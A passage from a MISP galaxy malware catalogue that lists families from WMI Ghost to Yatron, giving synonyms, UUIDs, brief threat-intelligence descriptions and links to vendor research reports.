- https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf - webarchive
- https://www-west.symantec.com/content/dam/symantec/docs/security-center/white-papers/waterbug-attack-group-16-en.pdf - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf - webarchive
- https://securelist.com/analysis/publications/65545/the-epic-turla-operation/ - webarchive
- https://docs.broadcom.com/doc/waterbug-attack-group - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WMI Ghost
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WMI Ghost.
Known Synonyms |
---|
Syndicasec |
Wimmie |
Internal MISP references
UUID 892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40
which can be used as unique global reference for WMI Ghost
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WndTest
Internal MISP references
UUID d8bf4ea1-054c-4a88-aa09-48da0d89c322
which can be used as unique global reference for WndTest
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Wonknu
Internal MISP references
UUID bfa75eb1-1d8d-4127-932f-3b7090a242e9
which can be used as unique global reference for Wonknu
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
woody
Internal MISP references
UUID 42e23d17-8f1b-43c9-bc76-e3cf098b5c52
which can be used as unique global reference for woody
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Woody RAT
Internal MISP references
UUID 9828a0ad-bb48-4cb5-b4f4-9b4133fa044f
which can be used as unique global reference for Woody RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Woolger
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Woolger.
Known Synonyms |
---|
WoolenLogger |
Internal MISP references
UUID 258751c7-1ddb-4df6-9a17-36b08c2cb267
which can be used as unique global reference for Woolger
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.woolger - webarchive
- https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf - webarchive
- https://documents.trendmicro.com/assets/wp/wp-operation-woolen-goldfish.pdf - webarchive
- http://www.trendmicro.it/media/wp/operation-woolen-goldfish-whitepaper-en.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WorldWind
Information Stealer.
Internal MISP references
UUID ebeca38e-0855-46e1-b46c-95405917231e
which can be used as unique global reference for WorldWind
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.worldwind - webarchive
- https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed - webarchive
- https://kienmanowar.wordpress.com/2023/04/08/quicknote-uncovering-suspected-malware-distributed-by-individuals-from-vietnam/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WORMHOLE
WORMHOLE is a TCP tunneler that is dynamically configurable from a C&C server and can communicate with an additional remote machine endpoint for a relay.
Internal MISP references
UUID c1bff74d-873d-41ad-9f76-b341e6fe5cb9
which can be used as unique global reference for WORMHOLE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180244/Lazarus_Under_The_Hood_PDF_final.pdf - webarchive
- https://content.fireeye.com/apt/rpt-apt38 - webarchive
- https://securelist.com/lazarus-under-the-hood/77908/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WormLocker
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WormLocker.
Known Synonyms |
---|
WormLckr |
Internal MISP references
UUID 4cc30b46-53c0-45c4-8847-e3b228bf8d7b
which can be used as unique global reference for WormLocker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WpBruteBot
Internal MISP references
UUID 454e0737-98d6-499a-8562-1adf5c081d0d
which can be used as unique global reference for WpBruteBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WSCSPL
Internal MISP references
UUID 62fd2b30-55b6-474a-8d72-31e492357d11
which can be used as unique global reference for WSCSPL
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.wscspl - webarchive
- https://ti.qianxin.com/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/ - webarchive
- https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Wslink
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Wslink.
Known Synonyms |
---|
FinickyFrogfish |
Internal MISP references
UUID 63fc32b0-3017-418c-b00a-ae20205e9c90
which can be used as unique global reference for Wslink
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.wslink - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2022/03/eset_wsliknkvm.pdf - webarchive
- https://www.welivesecurity.com/2021/10/27/wslink-unique-undocumented-malicious-loader-runs-server/ - webarchive
- https://twitter.com/darienhuss/status/1453342652682981378 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
x4
Internal MISP references
UUID 107341e7-e045-4798-9fab-16691e86bc58
which can be used as unique global reference for x4
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
X-Agent (Windows)
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular X-Agent (Windows).
Known Synonyms |
---|
chopstick |
splm |
Internal MISP references
UUID e8b38fbd-a7ce-4073-a660-44dfabc1b678
which can be used as unique global reference for X-Agent (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.xagent - webarchive
- https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-twilight - webarchive
- https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf - webarchive
- https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html - webarchive
- http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf - webarchive
- https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/ - webarchive
- http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf - webarchive
- https://assets.documentcloud.org/documents/3461560/Google-Aquarium-Clean.pdf - webarchive
- http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ - webarchive
- https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf - webarchive
- https://www.thecssc.com/wp-content/uploads/2018/10/4OctoberIOC-APT28-malware-advisory.pdf - webarchive
- https://securelist.com/a-slice-of-2017-sofacy-activity/83930/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XBot POS
Internal MISP references
UUID c6467cc3-dafd-482e-881e-ef2e7e244436
which can be used as unique global reference for XBot POS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XBTL
Internal MISP references
UUID fb3a8164-d8cb-495d-9b1c-57bed00c21ed
which can be used as unique global reference for XBTL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
xCaon
Check Point Research found this backdoor, attributed to IndigoZebra, used to target Afghanistan and other Central Asian countries, including Kyrgyzstan and Uzbekistan, since at least 2014.
Internal MISP references
UUID 2c150ebc-8fdf-4324-96cd-d6b0c0087d55
which can be used as unique global reference for xCaon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XData
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XData.
Known Synonyms |
---|
AESNI |
Internal MISP references
UUID 2fa666de-cab2-4c25-aa65-e5d162a979c9
which can be used as unique global reference for XData
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XDSpy
According to ESET Research, XDDown is a primary malware component and is strictly a downloader. It persists on the system using the traditional Run key. It downloads additional plugins from the hardcoded C&C server using the HTTP protocol. The HTTP replies contain PE binaries encrypted with a hardcoded two-byte XOR key. Plugins include a module for reconnaissance on the affected system, crawling drives, file exfiltration, SSID gathering, and grabbing saved passwords.
Internal MISP references
UUID 2cf836f5-b88a-417d-b3c6-ab2580fea6ad
which can be used as unique global reference for XDSpy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.xdspy - webarchive
- https://www.welivesecurity.com/2020/10/02/xdspy-stealing-government-secrets-since-2011/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf - webarchive
- https://github.com/eset/malware-ioc/tree/master/xdspy/ - webarchive
- https://vblocalhost.com/uploads/VB2020-Faou-Labelle.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XehookStealer
Xehook is a .NET-based malware targeting Windows systems. It collects data from Chromium and Gecko browsers, supporting over 110 cryptocurrencies and 2FA extensions. CRIL found a potential link between Xehook Stealer, Agniane, and the Cinoshi project, suggesting a progression from a free MaaS model to the development of Xehook Stealer. SmokeLoader binaries were identified as a common vector for distributing Xehook Stealer. Xehook Stealer shares code overlaps with Agniane Stealer, indicating an evolutionary relationship.
Internal MISP references
UUID 93780092-2007-49df-8d14-2701ae5a4c57
which can be used as unique global reference for XehookStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XenArmor
XenArmor is a suite of password recovery tools for various applications that have been observed to be abused in attacks alongside malware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XenArmor.
Known Synonyms |
---|
XenArmor Suite |
Internal MISP references
UUID 79fd77ba-4b40-4354-820a-16662edba41d
which can be used as unique global reference for XenArmor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Xenon Stealer
Internal MISP references
UUID 09fd85b1-6fc9-45af-a37e-732b5fc6447b
which can be used as unique global reference for Xenon Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XenoRAT
Internal MISP references
UUID 77f922e2-3787-4564-ba68-333ea3b948ba
which can be used as unique global reference for XenoRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.xenorat - webarchive
- https://blog.talosintelligence.com/moonpeak-malware-infrastructure-north-korea/ - webarchive
- https://hunt.io/blog/good-game-gone-bad-xeno-rat-spread-via-gg-domains-and-github - webarchive
- https://github.com/moom825/xeno-rat - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
X-Files Stealer
Internal MISP references
UUID 4e980ff8-20f2-4b3f-bad8-763321932b99
which can be used as unique global reference for X-Files Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.xfilesstealer - webarchive
- https://www.zscaler.com/blogs/security-research/x-files-stealer-evolution-analysis-and-comparison-study - webarchive
- https://twitter.com/3xp0rtblog/status/1473323635469438978 - webarchive
- https://cyberint.com/blog/research/xfiles-stealer-campaign-abusing-follina/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XFSADM
Internal MISP references
UUID e78a2a31-8c20-4493-b854-c708e81b3f41
which can be used as unique global reference for XFSADM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XFSCashNCR
Internal MISP references
UUID ba99edf0-1603-4f54-8fa9-18852417d0fc
which can be used as unique global reference for XFSCashNCR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Xiangoop
Internal MISP references
UUID b61903a1-51e6-493c-885f-6ffda99371ea
which can be used as unique global reference for Xiangoop
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.xiangoop - webarchive
- https://hitcon.org/2024/CMT/slides/Pirates_of_The_Nang_Hai_Follow_the_Artifacts_of_Tropic_Trooper,_No_One_Knows.pdf - webarchive
- https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XiaoBa
Ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XiaoBa.
Known Synonyms |
---|
FlyStudio |
Internal MISP references
UUID e839ae61-616c-4234-8edb-36b48040e5af
which can be used as unique global reference for XiaoBa
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
xmrig
According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".
In most cases, "bundling" is used to infiltrate several potentially unwanted applications (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Internal MISP references
UUID 88efd461-03dd-42eb-976c-5e9fe403fce6
which can be used as unique global reference for xmrig
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig - webarchive
- https://gridinsoft.com/xmrig - webarchive
- https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/ - webarchive
- https://www.akamai.com/blog/security-research/2024-php-exploit-cve-one-day-after-disclosure - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Xorist
According to PCrisk, Xorist is a family of ransomware-type malware. After stealth system infiltration, ransomware from this family encrypts various files stored on the computer. After encrypting the files, this ransomware creates a 'How to Decrypt Files.txt' text file on the victim's desktop. The file contains a message stating that the files can only be restored by paying a ransom.
Internal MISP references
UUID 029369aa-9e88-4e98-8fda-ca29a873acc5
which can be used as unique global reference for Xorist
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XP10
Ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XP10.
Known Synonyms |
---|
FakeChrome Ransomware |
Internal MISP references
UUID 6aa7047f-7dfa-4a10-b515-853c3795db69
which can be used as unique global reference for XP10
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
xPack
Symantec describes this as a decryptor/loader used by Chinese threat actor Antlion in campaigns targeting Taiwan.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular xPack.
Known Synonyms |
---|
NERAPACK |
Internal MISP references
UUID f87a348e-fa1f-4c90-8b46-ef382868d043
which can be used as unique global reference for xPack
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.xpack - webarchive
- https://thehackernews.com/2022/02/chinese-hackers-target-taiwanese.html - webarchive
- https://www.trendmicro.com/en_us/research/21/l/collecting-in-the-dark-tropic-trooper-targets-transportation-and-government-organizations.html - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Xpan
Internal MISP references
UUID 4da036c4-b76d-4f25-bc9e-3c5944ad0993
which can be used as unique global reference for Xpan
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XPCTRA
Incorporates code of Quasar RAT.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XPCTRA.
Known Synonyms |
---|
Expectra |
Internal MISP references
UUID 5f9ba149-100a-46eb-a959-0645d872975b
which can be used as unique global reference for XPCTRA
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.xpctra - webarchive
- https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html - webarchive
- https://www.buguroo.com/en/blog/bank-malware-in-brazil-xpctra-rat-analysis - webarchive
- https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XpertRAT
According to PCrisk, XpertRAT is a Remote Administration Trojan, a malicious program that allows cyber criminals to remotely access and control infected computers. Typically, users download and install this software inadvertently because they are tricked. Computers infected with malware such as XpertRAT can expose their users to serious problems.
Internal MISP references
UUID d03cb3af-2a01-4e46-859a-6b61f3ec3c68
which can be used as unique global reference for XpertRAT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.xpertrat - webarchive
- https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html - webarchive
- https://www.veronicavaleros.com/blog/2018/3/12/a-study-of-rats-third-timeline-iteration - webarchive
- https://labs.k7computing.com/?p=15672 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XP PrivEsc (CVE-2014-4076)
Internal MISP references
UUID 33f97c52-0bcd-43f4-88bb-99e7da9f49ae
which can be used as unique global reference for XP PrivEsc (CVE-2014-4076)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XServer
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XServer.
Known Synonyms |
---|
Filesnfer |
Internal MISP references
UUID b895ec07-19f7-4131-87c0-fc713fff2351
which can be used as unique global reference for XServer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
xsPlus
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular xsPlus.
Known Synonyms |
---|
nokian |
Internal MISP references
UUID b255fd2c-6ddb-452f-b660-c9f5d3a2ff63
which can be used as unique global reference for xsPlus
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.xsplus - webarchive
- https://securelist.com/analysis/publications/69953/the-naikon-apt/ - webarchive
- https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf - webarchive
- https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XTunnel
X-Tunnel is a network proxy tool that implements a custom network protocol encapsulated in the TLS protocol.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular XTunnel.
Known Synonyms |
---|
Shunnael |
X-Tunnel |
xaps |
Internal MISP references
UUID 53089817-6d65-4802-a7d2-5ccc3d919b74
which can be used as unique global reference for XTunnel
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.xtunnel - webarchive
- https://www.root9b.com/sites/default/files/whitepapers/R9b_FSOFACY_0.pdf - webarchive
- https://symantec-blogs.broadcom.com/blogs/election-security/apt28-espionage-military-government - webarchive
- https://www.root9b.com/sites/default/files/whitepapers/root9b_follow_up_report_apt28.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/iron-twilight - webarchive
- https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html - webarchive
- https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/ - webarchive
- http://download.microsoft.com/download/4/4/C/44CDEF0E-7924-4787-A56A-16261691ACE3/Microsoft_Security_Intelligence_Report_Volume_19_English.pdf - webarchive
- http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf - webarchive
- https://securelist.com/big-threats-using-code-similarity-part-1/97239/ - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/ - webarchive
- https://www.symantec.com/blogs/election-security/apt28-espionage-military-government - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
X-Tunnel (.NET)
This is a rewrite of win.xtunnel using the .NET framework that surfaced in late 2017.
Internal MISP references
UUID 000e25a4-4623-4afc-883d-ecc15be8f9d0
which can be used as unique global reference for X-Tunnel (.NET)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Xwo
In March 2019, AT&T Alien Labs identified a new malware family that is actively scanning for exposed web services and default passwords. Based on our findings we are calling it “Xwo” - taken from its primary module name. It is likely related to the previously reported malware families Xbash and MongoLock.
Internal MISP references
UUID 8a57cd75-4572-47c2-b5ef-55df978258de
which can be used as unique global reference for Xwo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
XWorm
Malware with a wide range of capabilities, ranging from RAT to ransomware.
Internal MISP references
UUID a5a05a52-5267-4baf-b4a3-366409b46721
which can be used as unique global reference for XWorm
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm - webarchive
- https://youtu.be/ln23TT9PcmI - webarchive
- https://www.sentinelone.com/labs/nullbulge-threat-actor-masquerades-as-hacktivist-group-rebelling-against-ai/ - webarchive
- https://youtu.be/tenNFzM-MM0 - webarchive
- https://unit42.paloaltonetworks.com/nodestealer-2-targets-facebook-business/ - webarchive
- https://www.elastic.co/security-labs/attack-chain-leads-to-xworm-and-agenttesla - webarchive
- https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/ - webarchive
- https://www.youtube.com/watch?v=tenNFzM-MM0 - webarchive
- https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/ - webarchive
- https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 - webarchive
- https://research.checkpoint.com/2024/foxit-pdf-flawed-design-exploitation/ - webarchive
- https://hunt.io/blog/hunting-and-collecting-malware-via-open-directories-part-1 - webarchive
- https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ - webarchive
- https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/steganoamor-campaign-ta558-mass-attacking-companies-and-public-institutions-all-around-the-world/ - webarchive
- https://kienmanowar.wordpress.com/2024/09/12/quicknote-the-xworm-malware-is-being-spread-through-a-phishing-email/ - webarchive
- https://medium.com/@b.magnezi/malware-analysis-xworm-80b3bbb072fb - webarchive
- https://www.securonix.com/blog/securonix-threat-labs-security-meme4chan-advisory/ - webarchive
- https://securityintelligence.com/x-force/hive0137-on-ai-journey/ - webarchive
- https://x.com/embee_research/status/1694635899903152619 - webarchive
- https://cert.pl/en/posts/2023/10/deworming-the-xworm/ - webarchive
- https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
xxmm
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular xxmm.
Known Synonyms |
---|
ShadowWalker |
Internal MISP references
UUID 1d451231-8b27-4250-b3db-55c5c8ea99cb
which can be used as unique global reference for xxmm
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.xxmm - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-butler - webarchive
- https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf - webarchive
- https://jsac.jpcert.or.jp/archive/2019/pdf/JSAC2019_8_nakatsuru_en.pdf - webarchive
- https://www.macnica.net/mpressioncss/feature_05.html/ - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/ - webarchive
- https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses - webarchive
- https://www.cybereason.com/blog/labs-shadowwali-new-variant-of-the-xxmm-family-of-backdoors - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
X-ZIGZAG
The author of X-ZIGZAG claims that it is a lightweight and stealthy Windows Remote Access Trojan (RAT) designed for educational purposes.
Internal MISP references
UUID a9f3ab12-4d4d-4904-a4b6-d8b48d4e4ac2
which can be used as unique global reference for X-ZIGZAG
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Yahoyah
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Yahoyah.
Known Synonyms |
---|
KeyBoy |
Internal MISP references
UUID a673b4fb-a864-4a5b-94ab-3fc4f5606cc8
which can be used as unique global reference for Yahoyah
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Yakuza
Ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Yakuza.
Known Synonyms |
---|
Teslarvng Ransomware |
Internal MISP references
UUID 0308eff9-1e8c-434e-b551-40f0ceb7dc0e
which can be used as unique global reference for Yakuza
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
YamaBot
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular YamaBot.
Known Synonyms |
---|
Kaos |
Internal MISP references
UUID 56243aaa-449e-4c0d-bb51-3f0b6294ec7d
which can be used as unique global reference for YamaBot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.yamabot - webarchive
- https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF - webarchive
- https://blogs.jpcert.or.jp/en/2022/07/yamabot.html - webarchive
- https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - webarchive
- https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html?m=1 - webarchive
- https://www.youtube.com/watch?v=nUjxH1gW53s - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Yanluowang
According to PCrisk, Yanluowang is ransomware that encrypts (and renames) files, ends all running processes, stops services, and creates the "README.txt" file containing a ransom note. It appends the ".yanluowang" extension to filenames. Cybercriminals behind Yanluowang are targeting enterprise entities and organizations in the financial sector.
Files encrypted by Yanluowang can be decrypted with this tool (it is possible to decrypt all files if the original file is larger than 3GB. If the original file is smaller than 3GB, then only smaller files can be decrypted).
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Yanluowang.
Known Synonyms |
---|
Dryxiphia |
Internal MISP references
UUID 4bc19ce2-e169-4f9f-aabf-ec7fc6a75d12
which can be used as unique global reference for Yanluowang
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.yanluowang - webarchive
- https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-yanluowang-ransomware-victims/ - webarchive
- https://twitter.com/CryptoInsane/status/1586967110504398853 - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-targeted-ransomware - webarchive
- https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf - webarchive
- https://securelist.com/how-to-recover-files-encrypted-by-yanlouwang/106332/ - webarchive
- https://de.darktrace.com/blog/inside-the-yanluowang-leak-organization-members-and-tactics - webarchive
- https://therecord.media/the-yanluowang-ransomware-group-in-their-own-words/ - webarchive
- https://github.com/albertzsigovits/malware-notes/tree/master/Ransomware-Windows-Yanluowang - webarchive
- https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
YaRAT
According to PTSecurity, this RAT uses Yandex Disk as a C2.
Internal MISP references
UUID 62fd30bc-1af6-40cc-a363-bb6aa85433cb
which can be used as unique global reference for YaRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Yarraq
Yarraq is ransomware that encrypts files using asymmetric keys and appends '.yarraq' as an extension to the end of filenames. At the time of writing the attacker asks for a $2000 ransom in exchange for a decryptor that lets victims restore their original files. The email address cyborgyarraq@protonmail.ch is provided for contacting the attacker.
Internal MISP references
UUID 3bba089d-cd27-465c-8c40-2ff9ff0316c6
which can be used as unique global reference for Yarraq
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Yasso
According to Palo Alto Networks, Yasso is an open source multi-platform intranet-assisted penetration toolset that brings together a number of features such as scanning, brute forcing, remote interactive shell, and running arbitrary commands. It is authored by a Mandarin-speaking pentester nicknamed Sairson.
Internal MISP references
UUID d58a18e8-e866-42df-a315-a1f72d2c26aa
which can be used as unique global reference for Yasso
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Yatron
Internal MISP references
UUID 710a27e6-0f17-4fa7-bcb9-e130fcb1ee7f
which can be used as unique global reference for Yatron
in MISP communities and other software using the MISP galaxy
External references
